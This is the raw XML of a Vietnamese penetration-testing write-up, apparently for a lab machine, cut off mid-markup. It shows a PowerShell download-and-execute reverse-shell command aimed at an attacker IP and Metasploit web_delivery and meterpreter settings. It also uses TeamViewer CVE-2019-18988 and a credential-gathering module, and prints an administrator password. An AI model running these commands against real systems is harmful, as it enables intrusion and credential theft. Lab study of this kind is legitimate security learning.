          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64EBBA67" wp14:editId="437A7050">
            <wp:extent cx="5943600" cy="6692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669290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="684CD2E7" w14:textId="13887353" w:rsidR="00117495" w:rsidRDefault="00117495">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3022E512" w14:textId="74BCE90D" w:rsidR="00117495" w:rsidRDefault="00117495">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1583D52D" wp14:editId="78977081">
            <wp:extent cx="5943600" cy="504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504190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4596E1" w14:textId="60DCC1D7" w:rsidR="00117495" w:rsidRDefault="00117495">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1005444D" w14:textId="78AB681C" w:rsidR="00BB51CD" w:rsidRDefault="00BB51CD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74F69F60" wp14:editId="207D0EBF">
            <wp:extent cx="5943600" cy="1071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2E0880DE" w14:textId="77777777" w:rsidR="004005AA" w:rsidRDefault="004005AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65FD2693" w14:textId="591C4ED1" w:rsidR="004005AA" w:rsidRDefault="004005AA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004005AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chúng ta nhận được kết nối đến máy chủ web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, chứng tỏ CMS bị dính lỗ hổng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3F2D14" w14:textId="77777777" w:rsidR="004005AA" w:rsidRDefault="004005AA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="307AD618" w14:textId="48AC5E91" w:rsidR="00117495" w:rsidRDefault="004005AA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00117495">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>everse shell bằng lệnh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sau</w:t>
      </w:r>
      <w:r w:rsidR="00117495">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D0788F" w14:textId="44704251" w:rsidR="00117495" w:rsidRDefault="00117495">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BA55CB5" w14:textId="17B4BECA" w:rsidR="00117495" w:rsidRPr="004005AA" w:rsidRDefault="00117495">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004005AA">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd /c powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.4:9000/powershell-reverse-shell.ps1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AB890F" w14:textId="55BCDAD3" w:rsidR="00117495" w:rsidRDefault="00117495">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00117495">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Khai thác không thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923B6B4" w14:textId="7A25005D" w:rsidR="003F3685" w:rsidRDefault="003F3685">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="788BDBFA" w14:textId="1D62C3DD" w:rsidR="003F3685" w:rsidRDefault="003F3685">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình sẽ tạo 1 payload khác bằng msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7100A4B6" w14:textId="40BBD97F" w:rsidR="003F3685" w:rsidRDefault="003F3685">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0193AEE3" w14:textId="48EBC5F8" w:rsidR="003F3685" w:rsidRPr="009671C2" w:rsidRDefault="003F3685">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009671C2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidR="003F1BA7" w:rsidRPr="009671C2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit/multi/script/web_delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34587B1A" w14:textId="512A46E4" w:rsidR="003F1BA7" w:rsidRPr="009671C2" w:rsidRDefault="003F1BA7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009671C2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set lhost 10.10.14.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEE852C" w14:textId="690C39FA" w:rsidR="003F1BA7" w:rsidRPr="009671C2" w:rsidRDefault="003F1BA7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009671C2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set lport 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15190C8E" w14:textId="40747426" w:rsidR="003F1BA7" w:rsidRPr="009671C2" w:rsidRDefault="003F1BA7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009671C2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">set payload </w:t>
      </w:r>
      <w:r w:rsidRPr="009671C2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E98BA6F" w14:textId="0C080442" w:rsidR="003F1BA7" w:rsidRPr="009671C2" w:rsidRDefault="004D333F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009671C2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set target 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3BA480" w14:textId="14AC5BA9" w:rsidR="004005AA" w:rsidRPr="009671C2" w:rsidRDefault="004005AA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009671C2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33452202" w14:textId="7E3688BB" w:rsidR="004005AA" w:rsidRDefault="004005AA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D285E41" w14:textId="07A284BF" w:rsidR="004005AA" w:rsidRDefault="006645A7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="235974C7" wp14:editId="7A401640">
            <wp:extent cx="5943600" cy="32296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00CB51A8" w14:textId="13084B56" w:rsidR="006645A7" w:rsidRDefault="006645A7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3DBF46" w14:textId="2063FE7B" w:rsidR="004D333F" w:rsidRDefault="009671C2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48473BBD" wp14:editId="7BE390C9">
            <wp:extent cx="5943600" cy="31432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3143250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3C73EA" w14:textId="1037984D" w:rsidR="00117495" w:rsidRDefault="00117495">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FDA6F9B" w14:textId="2B4C0807" w:rsidR="00117495" w:rsidRDefault="009671C2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BA7B93B" wp14:editId="2813F328">
            <wp:extent cx="5943600" cy="7613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761365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDCC4B8" w14:textId="16739658" w:rsidR="0012003F" w:rsidRDefault="0012003F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5B7D17" w14:textId="77777777" w:rsidR="0012003F" w:rsidRDefault="0012003F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB20291" w14:textId="22F3E22A" w:rsidR="00117495" w:rsidRDefault="00B82B3C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EAC8781" wp14:editId="5871DB38">
            <wp:extent cx="4533900" cy="469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4533900" cy="469900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0138318A" w14:textId="63D12B29" w:rsidR="00B82B3C" w:rsidRDefault="00B82B3C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A71AE4B" w14:textId="0060F3DC" w:rsidR="00B82B3C" w:rsidRDefault="009129C7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1198D5AF" wp14:editId="52B4E278">
            <wp:extent cx="5207000" cy="469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207000" cy="469900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB879AF" w14:textId="4320AE76" w:rsidR="00620F9B" w:rsidRDefault="00620F9B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D1C9CB" w14:textId="7B676EE3" w:rsidR="009E495B" w:rsidRPr="009E495B" w:rsidRDefault="009E495B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiểm tra các dịch vụ đang chạy, có 1 dịch vụ đang chạy bất thường trên máy ảo: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62342B1E" w14:textId="4A15EAA2" w:rsidR="009129C7" w:rsidRDefault="00620F9B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10B35016" wp14:editId="02BBABDD">
            <wp:extent cx="5943600" cy="27539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2753995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD1770" w14:textId="54AEE783" w:rsidR="009E495B" w:rsidRDefault="009E495B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E495B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Điều này chứng tỏ TeamViewer 7 đã cài đặt</w:t>
      </w:r>
      <w:r w:rsidR="00901E88">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, bị dính lỗ hổng CVE-2019-18988.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7B11F4" w14:textId="056F4215" w:rsidR="00117495" w:rsidRDefault="00901E88">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong các phiên bản bị dính lỗ hổng, mật khẩu AES-128-CBC được lưu trong Windows registry bằng key </w:t>
      </w:r>
      <w:r w:rsidRPr="00901E88">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0602000000a400005253413100040000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và iv </w:t>
      </w:r>
      <w:r w:rsidRPr="00901E88">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0100010067244F436E6762F25EA8D704</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1846D0C9" w14:textId="6FC4687D" w:rsidR="00901E88" w:rsidRDefault="00901E88">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CE96976" w14:textId="02CC1DC5" w:rsidR="00901E88" w:rsidRDefault="00901E88">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Background session và dùng module teamViewer_password của Metasploit để thu thập mật khẩu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9EB6BA" w14:textId="42D4E533" w:rsidR="00901E88" w:rsidRDefault="00901E88">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C69A805" w14:textId="35134376" w:rsidR="00901E88" w:rsidRPr="002F5131" w:rsidRDefault="0082195B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F5131">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use post/windows/gather/credentials/teamviewer_passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0FC7E1" w14:textId="1FA2CE01" w:rsidR="0082195B" w:rsidRPr="002F5131" w:rsidRDefault="00A40CA0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F5131">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C5BDA0" w14:textId="50732A1F" w:rsidR="00A40CA0" w:rsidRDefault="00A40CA0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F5131">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2675A6F0" w14:textId="77777777" w:rsidR="00A40CA0" w:rsidRDefault="00A40CA0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F12DC6" w14:textId="73C76210" w:rsidR="00117495" w:rsidRDefault="008B4B83">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43646C46" wp14:editId="6B749D67">
            <wp:extent cx="5943600" cy="7759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775970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="430A0483" w14:textId="725BE370" w:rsidR="008B4B83" w:rsidRDefault="008B4B83">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A313553" w14:textId="1944CAB4" w:rsidR="008B4B83" w:rsidRDefault="008B4B83">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>administrator:!R3m0te!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F212AF6" w14:textId="77777777" w:rsidR="008B4B83" w:rsidRDefault="008B4B83">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E34535" w14:textId="6957817C" w:rsidR="00117495" w:rsidRDefault="003675ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79F513BA" wp14:editId="13D83AE1">
            <wp:extent cx="4299857" cy="281222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4324566" cy="2828390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0F5147" w14:textId="2FAE0BD4" w:rsidR="003675ED" w:rsidRDefault="003675ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
